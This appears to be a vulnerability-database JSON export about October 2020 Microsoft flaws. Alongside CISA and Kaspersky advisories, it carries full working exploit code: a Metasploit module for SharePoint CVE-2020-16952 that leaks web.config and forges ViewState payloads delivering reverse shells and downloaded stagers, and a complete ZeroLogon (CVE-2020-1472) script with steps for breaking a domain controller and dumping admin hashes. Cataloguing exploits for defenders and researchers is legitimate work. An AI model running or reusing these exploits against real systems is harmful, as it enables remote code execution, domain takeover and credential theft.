to do (default check):\n[check|restore|exploit]')\n parser.add_argument('-target', action='store',\n help='NETBIOS name of target DC (not the FQDN)')\n parser.add_argument('-ip', action='store',\n help='IP address of target DC')\n parser.add_argument('-password', default='', action='store',\n help='The plaintext password to use to\nreset the DC')\n parser.add_argument('-hex', default='', action='store',\n help='The hex password to use to restore\nthe DC (recommended)')\n parser.add_argument('-max', default=2000, action='store',\n help='Max attempts to authenticate with\nthe DC (usually ~300 or less)')\n\n if len(sys.argv) < 3:\n parser.print_help()\n print(info)\n sys.exit(1)\n options = parser.parse_args()\n\n if options.do.lower() == 'check':\n Exploit(\n name=options.target,\n address=options.ip,\n attempts=int(options.max)\n ).authenticate()\n elif options.do.lower() == 'exploit':\n exp = Exploit(\n name=options.target,\n address=options.ip,\n attempts=int(options.max)\n )\n if exp.authenticate():\n exp.exploit()\n elif options.do.lower() == 'restore':\n if options.hex != '' and options.password == '':\n options.password = unhexlify(options.hex)\n if options.password != '':\n exp = Exploit(\n name=options.target,\n address=options.ip,\n password=options.password\n ).restore()\n else:\n parser.print_help()\n\n except Exception as error:\n sys.stderr.write('[-] error in main %s\\n' % str(error))\n", "sourceHref": "https://0day.today/exploit/35274", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-02-24T18:06:35", "description": "The United Kingdom (UK) National Cyber Security Centre (NCSC) has released an [Alert](<https://www.ncsc.gov.uk/news/sharepoint-vulnerability-uk-organisations >) to address a vulnerability\u2014CVE-2020-16952\u2014affecting Microsoft SharePoint server. An attacker could exploit this vulnerability to take control of an affected system. Applying patches from Microsoft\u2019s October 2020 Security Advisory for [CVE-2020-16952](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952>) can prevent exploitation of this vulnerability.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages administrators to review the [NCSC Alert](<https://www.ncsc.gov.uk/news/sharepoint-vulnerability-uk-organisations>) and the Microsoft Security Advisory for [CVE-2020-16952](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952>) for more information.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/10/16/ncsc-releases-alert-microsoft-sharepoint-vulnerability>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-16T00:00:00", "type": "cisa", "title": "NCSC Releases Alert on Microsoft SharePoint Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16952"], "modified": "2020-10-16T00:00:00", "id": "CISA:48962A3B37B032DCF622B3E3135B8A1A", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/10/16/ncsc-releases-alert-microsoft-sharepoint-vulnerability", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-24T18:06:40", "description": "Microsoft has released a security update to address a protocol vulnerability\u2014CVE-2020-16898\u2014in Windows Transmission Control Protocol (TCP)/IP stack handling of Internet Control Message Protocol version 6 (ICMPv6) Router Advertisement packets. A remote attacker could exploit this vulnerability to take control of an affected system or cause a denial-of-service condition. \n \nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Microsoft\u2019s [Security Advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898>) for more information, and apply the necessary updates or workaround. \n\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/10/14/microsoft-addresses-windows-tcpip-rcedos-vulnerability>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-14T00:00:00", "type": "cisa", "title": "Microsoft Addresses Windows TCP/IP RCE/DoS Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16898"], "modified": "2020-10-14T00:00:00", "id": "CISA:348CDAC76EADE8EE621368419146CDE1", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/10/14/microsoft-addresses-windows-tcpip-rcedos-vulnerability", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-10-19T16:33:40", "description": "", "cvss3": {}, "published": "2020-10-19T00:00:00", "type": "packetstorm", "title": "Microsoft SharePoint SSI / ViewState Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-16952"], "modified": "2020-10-19T00:00:00", "id": "PACKETSTORM:159612", "href": "https://packetstormsecurity.com/files/159612/Microsoft-SharePoint-SSI-ViewState-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::ViewState \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::Powershell \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft SharePoint Server-Side Include and ViewState RCE', \n'Description' => %q{ \nThis module exploits a server-side include (SSI) in SharePoint to leak \nthe web.config file and forge a malicious ViewState with the extracted \nvalidation key. \n \nThis exploit is authenticated and requires a user with page creation \nprivileges, which is a standard permission in SharePoint. \n \nThe web.config file will be stored in loot once retrieved, and the \nVALIDATION_KEY option can be set to short-circuit the SSI and trigger \nthe ViewState deserialization. \n \nTested against SharePoint 2019 on Windows Server 2016. \n}, \n'Author' => [ \n'mr_me', # Discovery and exploit \n'wvu' # Module \n], \n'References' => [ \n['CVE', '2020-16952'], \n['URL', 'https://srcincite.io/advisories/src-2020-0022/'], \n['URL', 'https://srcincite.io/pocs/cve-2020-16952.py.txt'], \n['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952'] \n], \n'DisclosureDate' => '2020-10-13', # Public disclosure \n'License' => MSF_LICENSE, \n'Platform' => 'win', \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Windows Command', \n'Arch' => ARCH_CMD, \n'Type' => :win_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' \n} \n], \n[ \n'Windows Dropper', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :win_dropper, \n'CmdStagerFlavor' => %i[psh_invokewebrequest certutil vbs], \n'DefaultOptions' => { \n'CMDSTAGER::FLAVOR' => :psh_invokewebrequest, \n'PAYLOAD' => 'windows/x64/meterpreter_reverse_https' \n} \n], \n[ \n'PowerShell Stager', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :psh_stager, \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_https' \n} \n] \n], \n'DefaultTarget' => 2, \n'DefaultOptions' => { \n'DotNetGadgetChain' => :TypeConfuseDelegate \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [UNRELIABLE_SESSION], # SSI may fail the second time \n'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']), \nOptString.new('VALIDATION_KEY', [false, 'ViewState validation key']), \n# \"Promote\" these advanced options so we don't have to pass around our own \nOptString.new('HttpUsername', [false, 'SharePoint username']), \nOptString.new('HttpPassword', [false, 'SharePoint password']) \n]) \nend \n \ndef post_auth? \ntrue \nend \n \ndef username \ndatastore['HttpUsername'] \nend \n \ndef password \ndatastore['HttpPassword'] \nend \n \ndef vuln_builds \n[ \n[Gem::Version.new('15.0.0.4571'), Gem::Version.new('15.0.0.5275')], # SharePoint 2013 \n[Gem::Version.new('16.0.0.4351'), Gem::Version.new('16.0.0.5056')], # SharePoint 2016 \n[Gem::Version.new('16.0.0.10337'), Gem::Version.new('16.0.0.10366')] # SharePoint 2019 \n] \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path) \n) \n \nunless res \nreturn CheckCode::Unknown('Target did not respond to check.') \nend \n \n# Hat tip @tsellers-r7 \n# \n# MicrosoftSharePointTeamServices: 16.0.0.10337: 1; RequireReadOnly \nunless (build_header = res.headers['MicrosoftSharePointTeamServices']) \nreturn CheckCode::Unknown('Target does not appear to be running SharePoint.') \nend \n \nunless (build = build_header.scan(/^([\\d.]+):/).flatten.first) \nreturn CheckCode::Detected('Target did not respond with SharePoint build.') \nend \n \nif vuln_builds.any? { |build_range| Gem::Version.new(build).between?(*build_range) } \nreturn CheckCode::Appears(\"SharePoint #{build} is a vulnerable build.\") \nend \n \nCheckCode::Safe(\"SharePoint #{build} is not a vulnerable build.\") \nend \n \ndef exploit \nunless username && password \nfail_with(Failure::BadConfig, 'HttpUsername and HttpPassword are required for exploitation') \nend \n \nif (@validation_key = datastore['VALIDATION_KEY']) \nprint_status(\"Using ViewState validation key #{@validation_key}\") \nelse \ncreate_ssi_page \nleak_web_config \nend \n \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \n \ncase target['Type'] \nwhen :win_cmd \nexecute_command(payload.encoded) \nwhen :win_dropper \nexecute_cmdstager \nwhen :psh_stager \nexecute_command(cmd_psh_payload( \npayload.encoded, \npayload.arch.first, \nremove_comspec: true \n)) \nend \nend \n \ndef create_ssi_page \nprint_status(\"Creating page for SSI: #{ssi_path}\") \n \nres = send_request_cgi( \n'method' => 'PUT', \n'uri' => ssi_path, \n'data' => ssi_page \n) \n \nunless res \nfail_with(Failure::Unreachable, \"Target did not respond to #{__method__}\") \nend \n \nunless [200, 201].include?(res.code) \nif res.code == 401 \nfail_with(Failure::NoAccess, \"Failed to auth with creds #{username}:#{password}\") \nend \n \nfail_with(Failure::NotFound, 'Failed to create page') \nend \n \nprint_good('Successfully created page') \n@page_created = true \nend \n \ndef leak_web_config \nprint_status('Leaking web.config') \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => ssi_path, \n'headers' => { \nssi_header => '<form runat=\"server\" /><!--#include virtual=\"/web.config\"-->' \n} \n) \n \nunless res \nfail_with(Failure::Unreachable, \"Target did not respond to #{__method__}\") \nend \n \nunless res.code == 200 \nfail_with(Failure::NotFound, \"Failed to retrieve #{ssi_path}\") \nend \n \nunless (web_config = res.get_xml_document.at('//configuration')) \nfail_with(Failure::NotFound, 'Failed to extract web.config from response') \nend \n \nprint_good(\"Saved web.config to: #{store_loot('web.config', 'text/xml', rhost, web_config.to_xml, 'web.config', name)}\") \n \nunless (@validation_key = extract_viewstate_validation_key(web_config)) \nfail_with(Failure::NotFound, 'Failed to extract ViewState validation key') \nend \n \nprint_good(\"ViewState validation key: #{@validation_key}\") \nensure \ndelete_ssi_page if @page_created \nend \n \ndef delete_ssi_page \nprint_status(\"Deleting #{ssi_path}\") \n \nres = send_request_cgi( \n'method' => 'DELETE', \n'uri' => ssi_path, \n'partial' => true \n) \n \nunless res \nfail_with(Failure::Unreachable, \"Target did not respond to #{__method__}\") \nend \n \nunless res.code == 204 \nprint_warning('Failed to delete page') \nreturn \nend \n \nprint_good('Successfully deleted page') \nend \n \ndef execute_command(cmd, _opts = {}) \nvprint_status(\"Executing command: #{cmd}\") \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/_layouts/15/zoombldr.aspx'), \n'vars_post' => { \n'__VIEWSTATE' => generate_viewstate_payload( \ncmd, \nextra: pack_viewstate_generator('63E6434F'), # /_layouts/15/zoombldr.aspx \nalgo: 'sha256', \nkey: pack_viewstate_validation_key(@validation_key) \n) \n} \n) \n \nunless res \nfail_with(Failure::Unreachable, \"Target did not respond to #{__method__}\") \nend \n \nunless res.code == 200 \nfail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\") \nend \n \nvprint_good('Successfully executed command') \nend \n \ndef ssi_page \n<<~XML \n<WebPartPages:DataFormWebPart runat=\"server\"> \n<ParameterBindings> \n<ParameterBinding Name=\"#{ssi_param}\" Location=\"ServerVariable(HTTP_#{ssi_header})\" DefaultValue=\"\" /> \n</ParameterBindings> \n<xsl> \n<xsl:stylesheet xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\" version=\"1.0\"> \n<xsl:param name=\"#{ssi_param}\" /> \n<xsl:template match=\"/\"> \n<xsl:value-of select=\"$#{ssi_param}\" disable-output-escaping=\"yes\" /> \n</xsl:template> \n</xsl:stylesheet> \n</xsl> \n</WebPartPages:DataFormWebPart> \nXML \nend \n \ndef ssi_path \n@ssi_path ||= normalize_uri(target_uri.path, \"#{rand_text_alphanumeric(8..42)}.aspx\") \nend \n \ndef ssi_header \n@ssi_header ||= rand_text_alphanumeric(8..42) \nend \n \ndef ssi_param \n@ssi_param ||= rand_text_alphanumeric(8..42) \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/159612/sharepoint_ssi_viewstate.rb.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-11-18T23:15:12", "description": "", "cvss3": {}, "published": "2020-11-18T00:00:00", "type": "packetstorm", "title": "Zerologon Netlogon Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2020-11-18T00:00:00", "id": "PACKETSTORM:160127", "href": "https://packetstormsecurity.com/files/160127/Zerologon-Netlogon-Privilege-Escalation.html", "sourceData": "`# Exploit Title: ZeroLogon - Netlogon Elevation of Privilege \n# Date: 2020-10-04 \n# Exploit Author: West Shepherd \n# Vendor Homepage: https://www.microsoft.com \n# Version: Microsoft Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012, Windows Server 2008 R2 \n# Tested on: Microsoft Windows Server 2016 Standard x64 \n# CVE : CVE-2020-1472 \n# Credit to: Tom Tervoort for discovery and Dirk-Janm for Impacket code \n# Sources: https://www.secura.com/pathtoimg.php?id=2055 \n# Requirements: python3 and impacket 0.9.21+ (tested using this version) \n#!/usr/bin/env python3 \nimport hmac, hashlib, struct, sys, socket, time, argparse, logging, codecs \nfrom binascii import hexlify, unhexlify \nfrom subprocess import check_call \nfrom impacket.dcerpc.v5.dtypes import NULL, MAXIMUM_ALLOWED \nfrom impacket.dcerpc.v5 import nrpc, epm, transport \nfrom impacket import crypto, version \nfrom impacket.examples import logger \nfrom Cryptodome.Cipher import AES \nfrom struct import pack, unpack \nfrom impacket.dcerpc.v5.rpcrt import DCERPCException \n \n \nclass Exploit: \ndef __init__( \nself, \nname='', \naddress='', \nattempts=2000, \npassword='' \n): \nname = name.rstrip('$') \nself.secureChannelType = nrpc.NETLOGON_SECURE_CHANNEL_TYPE\\ \n.ServerSecureChannel \nself.authenticator = self.getAuthenticator(stamp=0) \nself.clearNewPasswordBlob = b'\\x00' * 516 \nself.primaryName = ('\\\\\\\\%s' % name) + '\\x00' \nself.accountName = ('%s$' % name) + '\\x00' \nself.computerName = name + '\\x00' \nself.clientCredential = b'\\x00' * 8 \nself.clientChallenge = b'\\x00' * 8 \nself.negotiateFlags = 0x212fffff \nself.address = address \nself.max = attempts \nself.dce = None \nself.sessionKey = None \nself.clientStoredCredential = None \nself.password = password \n \ndef encodePassword(self, password): \nif isinstance(password, str): \npassword = password.encode('utf-8') \nreturn b'\\x00' * (512 - len(password))\\ \n+ password \\ \n+ pack('<L', len(password)) \n \ndef getAuthenticator(self, creds=b'\\x00' * 8, stamp=10): \nauthenticator = nrpc.NETLOGON_AUTHENTICATOR() \nauthenticator['Credential'] = creds \nauthenticator['Timestamp'] = stamp \nreturn authenticator \n \ndef serverReqChallenge(self): \ntry: \nbinding = epm.hept_map( \nself.address, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp' \n) \nself.dce = transport.DCERPCTransportFactory(binding).get_dce_rpc() \nself.dce.connect() \nself.dce.bind(nrpc.MSRPC_UUID_NRPC) \nreturn nrpc.hNetrServerReqChallenge( \nself.dce, \nself.primaryName, \nself.computerName, \nself.clientChallenge \n) \nexcept BaseException as ex: \nself.logError(ex) \n \ndef serverAuthenticate(self): \ntry: \nauth = nrpc.hNetrServerAuthenticate3( \nself.dce, \nself.primaryName, \nself.accountName, \nself.secureChannelType, \nself.computerName, \nself.clientCredential, \nself.negotiateFlags \n) \nassert auth['ErrorCode'] == 0 \nself.logInfo('successfully authenticated') \nreturn True \nexcept nrpc.DCERPCSessionError as ex: \nself.dce = None \nif ex.get_error_code() == 0xc0000022: \nreturn None \nelse: \nself.logFail(ex.get_error_code()) \nexcept BaseException as ex: \nself.dce = None \nself.logFail(ex) \nself.dce = None \n \ndef serverPasswordSet(self): \ntry: \nreturn nrpc.hNetrServerPasswordSet2( \nself.dce, \nself.primaryName, \nself.accountName, \nself.secureChannelType, \nself.computerName, \nself.authenticator, \nself.clearNewPasswordBlob \n) \nexcept BaseException as ex: \nself.logError(ex) \n \ndef authenticate(self): \nself.logInfo( \n'checking target, attempting to authenticate %d max \nattempts' % self.max \n) \nfor attempt in range(0, self.max): \nself.logInfo('attempt %d' % attempt) \nself.serverReqChallenge() \nself.serverAuthenticate() \nif self.dce is not None: \nbreak \nif self.dce: \nreturn True \nelse: \nself.logError('failed to authenticate') \n \ndef exploit(self): \nself.logInfo('attempting password reset') \nreset = self.serverPasswordSet() \nif reset['ErrorCode'] == 0: \nself.logInfo('successfully reset password') \nelse: \nself.logError('failed to reset password') \nreturn self \n \ndef ComputeNetlogonCredentialAES(self, challenge): \nreturn nrpc.ComputeNetlogonCredentialAES( \nchallenge, \nself.sessionKey \n) \n \ndef logInfo(self, message): \nsys.stdout.write(\"[+] %s\\n\" % str(message)) \nreturn self \n \ndef logError(self, message): \nsys.stderr.write(\"[-] error %s\\n\" % str(message)) \n \ndef logFail(self, message): \nsys.stderr.write(\"[!] failure %s\\n\" % str(message)) \nsys.exit(2) \n \ndef restore(self): \nself.logInfo('attempting to restore password') \nself.clientChallenge = b'12345678' \ntry: \nself.primaryName = NULL \nchallenge = self.serverReqChallenge() \nself.sessionKey = nrpc.ComputeSessionKeyAES( \n'', self.clientChallenge, challenge['ServerChallenge'] \n) \nself.clientCredential = self.ComputeNetlogonCredentialAES( \nself.clientChallenge \n) \ntry: \nself.serverAuthenticate() \nexcept Exception as e: \nif str(e).find('STATUS_DOWNGRADE_DETECTED') < 0: \nraise \nself.logInfo('restoring password') \nself.clientStoredCredential = pack('<Q', unpack('<Q', \nself.clientCredential)[0] + 10) \nself.authenticator = self.getAuthenticator( \n \ncreds=self.ComputeNetlogonCredentialAES(self.clientStoredCredential) \n) \nself.clearNewPasswordBlob = self.ComputeNetlogonCredentialAES( \nself.encodePassword(self.password) \n) \nreset = self.serverPasswordSet() \nif reset['ErrorCode'] == 0: \nself.logInfo('successfully restored password') \nelse: \nself.logError('failed to restore password') \nexcept Exception as ex: \nself.logError(ex) \nreturn self \n \n \nif __name__ == '__main__': \ninfo = \"\"\" \nNOTE - Exploitation will break the DC until restored, recommended guidelines: \n \n1. Check the DC - usually ~300 attempts, use the NETBIOS name not the FQDN: \ncve-2020-1472.py -do check -target <NETBIOS NAME> -ip <IP> \n \n2. Exploit the DC - this will break the DC until restored: \ncve-2020-1472.py -do exploit <NETBIOS NAME> -ip <IP> \n \n3. Dump the DC - for the DA hashes, this will not contain the \nmachine hex-pass: \nsecretsdump.py -just-dc -no-pass <NETBIOS NAME>\\$@<IP> \n \n4. Dump the DC again - use the DA hash to get the machines hex-pass: \nsecretsdump.py -no-pass -hashes <LMHASH>:<NTHASH> <DOMAIN>/<ADMIN>@<IP> \n \n5. Restore target - this fixes the DC: \ncve-2020-1472.py -do restore -target <NETBIOS NAME> -ip <IP> \n-hex <HEXPASS> \n\"\"\" \nparser = argparse.ArgumentParser( \ndescription='CVE-2020-1472 ZeroLogon Exploit - Netlogon \nElevation of Privilege', \nadd_help=True \n) \ntry: \nparser.add_argument('-do', default='check', action='store', \nhelp='What to do (default check): \n[check|restore|exploit]') \nparser.add_argument('-target', action='store', \nhelp='NETBIOS name of target DC (not the FQDN)') \nparser.add_argument('-ip', action='store', \nhelp='IP address of target DC') \nparser.add_argument('-password', default='', action='store', \nhelp='The plaintext password to use to \nreset the DC') \nparser.add_argument('-hex', default='', action='store', \nhelp='The hex password to use to restore \nthe DC (recommended)') \nparser.add_argument('-max', default=2000, action='store', \nhelp='Max attempts to authenticate with \nthe DC (usually ~300 or less)') \n \nif len(sys.argv) < 3: \nparser.print_help() \nprint(info) \nsys.exit(1) \noptions = parser.parse_args() \n \nif options.do.lower() == 'check': \nExploit( \nname=options.target, \naddress=options.ip, \nattempts=int(options.max) \n).authenticate() \nelif options.do.lower() == 'exploit': \nexp = Exploit( \nname=options.target, \naddress=options.ip, \nattempts=int(options.max) \n) \nif exp.authenticate(): \nexp.exploit() \nelif options.do.lower() == 'restore': \nif options.hex != '' and options.password == '': \noptions.password = unhexlify(options.hex) \nif options.password != '': \nexp = Exploit( \nname=options.target, \naddress=options.ip, \npassword=options.password \n).restore() \nelse: \nparser.print_help() \n \nexcept Exception as error: \nsys.stderr.write('[-] error in main %s\\n' % str(error)) \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/160127/zerologon-poc.txt", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2021-08-18T11:00:17", "description": "### *Detect date*:\n10/13/2020\n\n### *Severity*:\nCritical\n\n### *Description*:\nACE vulnerabilities were found in Microsoft Apps. Malicious users can exploit this vulnerability to execute arbitrary code.\n\n### *Affected products*:\nMicrosoft 365 Apps for Enterprise for 32-bit Systems \nMicrosoft 365 Apps for Enterprise for 64-bit Systems \n3D Viewer\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2020-17003](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-17003>) \n[CVE-2020-16918](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16918>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Yammer Desktop App](<https://threats.kaspersky.com/en/product/Yammer-Desktop-App/>)\n\n### *CVE-IDS*:\n[CVE-2020-17003](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17003>)9.3Critical \n[CVE-2020-16918](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16918>)9.3Critical", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-13T00:00:00", "type": "kaspersky", "title": "KLA11974 ACE vulnerabilities in Microsoft Apps", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16918", "CVE-2020-17003"], "modified": "2020-10-19T00:00:00", "id": "KLA11974", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11974/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-19T18:04:13", "description": "### *Detect date*:\n10/13/2020\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to execute arbitrary code, obtain sensitive information, gain privileges, spoof user interface, cause denial of service, bypass security restrictions.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows 10 Version 1809 for x64-based Systems \nWindows 10 Version 2004 for x64-based Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows Server, version 1903 (Server Core installation) \nWindows Server 2012 (Server Core installation) \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 1903 for ARM64-based Systems \nWindows Server 2019 (Server Core installation) \nWindows 10 for 32-bit Systems \nWindows Server 2012 R2 \nWindows Server 2016 (Server Core installation) \nWindows 10 Version 2004 for 32-bit Systems \nWindows 10 Version 1803 for x64-based Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows RT 8.1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 2004 for ARM64-based Systems \nWindows Server 2012 \nWindows Server 2016 \nWindows 8.1 for x64-based systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 10 Version 1803 for ARM64-based Systems \nWindows 10 Version 1709 for 32-bit Systems \nWindows 10 for x64-based Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 8.1 for 32-bit systems \nWindows Server, version 2004 (Server Core installation) \nWindows 10 Version 1903 for 32-bit Systems \nWindows 10 Version 1709 for ARM64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1709 for x64-based Systems \nWindows 10 Version 1903 for x64-based Systems \nWindows 10 Version 1809 for 32-bit Systems \nWindows Server, version 1909 (Server Core installation) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 10 Version 1803 for 32-bit Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2019\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2020-16923](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16923>) \n[CVE-2020-16889](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16889>) \n[CVE-2020-16887](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16887>) \n[CVE-2020-16902](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16902>) \n[CVE-2020-16885](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16885>) \n[CVE-2020-16898](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16898>) \n[CVE-2020-16968](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2020-16968>) 